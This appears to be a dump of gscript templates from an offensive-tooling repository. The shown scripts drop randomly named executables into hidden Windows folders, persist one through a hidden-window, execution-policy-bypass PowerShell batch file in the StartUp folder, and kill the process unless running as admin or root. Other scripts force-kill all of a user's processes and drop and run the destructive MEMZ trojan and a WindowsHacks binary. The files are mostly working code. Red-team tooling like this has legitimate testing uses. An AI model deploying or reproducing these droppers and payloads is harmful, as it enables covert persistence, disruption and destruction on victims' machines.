22 | var name = "";
23 | var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
24 | for (var i = 0; i < 3; i++)
25 | name += possible.charAt(Math.floor(Math.random() * possible.length));
26 | fn = "C:\\ProgramData\\Microsoft\\DRM\\" + name + ".exe";
27 | WriteFile(fn, example.fileData, 0755);
28 | LogInfo("dropped the example binary here: "+fn);
29 |
30 | // Persist the sample
31 | var cmd = "powershell.exe -NoLogo -WindowStyle hidden -ep bypass " + fn;
32 | fn2 = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\start.bat";
33 | WriteFile(fn2, StringToByteArray(cmd), 0755);
34 | LogInfo("persisted the example binary using bat / powershell script in StartUp folder");
35 |
36 | // Execute the sample
37 | //ForkExecuteCommand("powershell", ["-NoLogo", "-WindowStyle", "hidden", "-ep", "bypass", fn]);
38 | //LogInfo("executed the example binary");
39 | return true;
40 | }
41 |
42 | function AfterDeploy() {
43 | LogInfo("done, deployed binary with startup persistence");
44 | return true;
45 | }
46 |
--------------------------------------------------------------------------------
/beta/ops/ensure_admin.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Ensure_Admin
3 | // Author: ahhh
4 | // Purpose: Gets the current user's name, if it's Administrator or root we can continue other wise shuts down the gscript binary
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:40
9 | //timeout:40
10 |
11 | function BeforeDeploy() {
12 | LogInfo("Testing Admin Users!");
13 | var well = GetUser();
14 | LogInfo("Our user is: "+well.username);
15 | if ((well.username == "Administrator") || (well.username == "root")) {
16 | return true;
17 | } else {
18 | LogInfo("Detected a non admin / root user!");
19 | KillSelf();
20 | return false;
21 | }
22 | return true;
23 | }
24 |
25 | function Deploy() {
26 | return true;
27 | }
28 |
29 | function AfterDeploy() {
30 | LogInfo("Done ensuring admin users!");
31 | return true;
32 | }
--------------------------------------------------------------------------------
/troll/windows/killall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: killall Example
3 | // Author: ahhh
4 | // Purpose: Drops killall as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:450
9 | //timeout:550
10 |
11 | //go_import:os as os2
12 |
13 | function Deploy() {
14 |
15 | // Run payload
16 | var temppath = os2.TempDir();
17 | var error4 = G.file.WriteFileFromString(temppath+"\\killall.bat", 'sleep 8 && TASKKILL /FI "USERNAME eq User" /F');
18 | var running = G.exec.ExecuteCommandAsync(temppath+"\\killall.bat", [""]);
19 | console.log("errors: "+running[1]);
20 |
21 | return true
22 | }
--------------------------------------------------------------------------------
/troll/windows/memz.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Memz Example
3 | // Author: ahhh
4 | // Purpose: Drops Memz as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 | //import:/private/tmp/memz.exe
11 |
12 | //go_import:os as os2
13 |
14 | function Deploy() {
15 |
16 | console.log("Starting to drop memz binary");
17 | // Getting our asset
18 | var memzBin = GetAssetAsBytes("memz.exe");
19 | console.log("errors: "+memzBin[1]);
20 |
21 | // Getting a random string
22 | var temppath = os2.TempDir();
23 | var naming = G.rand.GetAlphaString(4);
24 | naming = naming.toLowerCase();
25 | var fullpath = temppath+"\\"+naming+".exe";
26 | console.log("file name: "+ fullpath);
27 |
28 | // Write payload
29 | errors = G.file.WriteFileFromBytes(fullpath, memzBin[0]);
30 | console.log("errors: "+errors);
31 |
32 | // Run payload
33 | var running = G.exec.ExecuteCommandAsync(fullpath, [""]);
34 | console.log("errors: "+running[1]);
35 |
36 | return true
37 | }
--------------------------------------------------------------------------------
/troll/windows/win_viz.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: WindowsHacks Example
3 | // Author: ahhh
4 | // Purpose: Drops WindowsHacks as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Uses: https://github.com/LazoCoder/Windows-Hacks
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //import:/private/tmp/WindowsHacks.exe
13 | //import:/private/tmp/ImageProcessing.dll
14 | //import:/private/tmp/WindowsAPI.dll
15 |
16 | //go_import:os as os2
17 |
18 | function Deploy() {
19 |
20 | console.log("Starting to drop windowz Hacks");
21 | // Getting our main binary
22 | var winBin = GetAssetAsBytes("WindowsHacks.exe");
23 | console.log("errors: "+winBin[1]);
24 | var temppath = os2.TempDir();
25 | var naming = G.rand.GetAlphaString(4);
26 | naming = naming.toLowerCase();
27 | var fullpath = temppath+"\\"+naming+".exe";
28 | console.log("file name: "+ fullpath);
29 | var errors = G.file.WriteFileFromBytes(fullpath, winBin[0]);
30 | console.log("errors: "+errors);
31 | // Get our supporting dlls
32 | // Payload 2
33 | var winBin2 = GetAssetAsBytes("ImageProcessing.dll");
34 | var fullpath2 = temppath+"\\ImageProcessing.dll";
35 | console.log("file name: "+ fullpath2);
36 | var errors2 = G.file.WriteFileFromBytes(fullpath2, winBin2[0]);
37 | console.log("errors: "+errors2);
38 | // Payload 3
39 | var winBin3 = GetAssetAsBytes("WindowsAPI.dll");
40 | console.log("errors: "+winBin2[1]);
41 | var fullpath3 = temppath+"\\WindowsAPI.dll";
42 | console.log("file name: "+ fullpath3);
43 | var errors3 = G.file.WriteFileFromBytes(fullpath3, winBin3[0]);
44 | console.log("errors: "+errors3);
45 |
46 | // Run main payload
47 | var error4 = G.file.WriteFileFromString(temppath+"\\ok.bat", "echo 5 | "+fullpath);
48 | //var enc = G.encoding.EncodeBase64("echo 5 | "+fullpath);
49 | //var cmd = "-WindowStyle Hidden -EncodedCommand "+enc;
50 | var running = G.exec.ExecuteCommandAsync(temppath+"\\ok.bat", [""]);
51 | console.log("errors: "+running[1]);
52 |
53 | return true;
54 | }
--------------------------------------------------------------------------------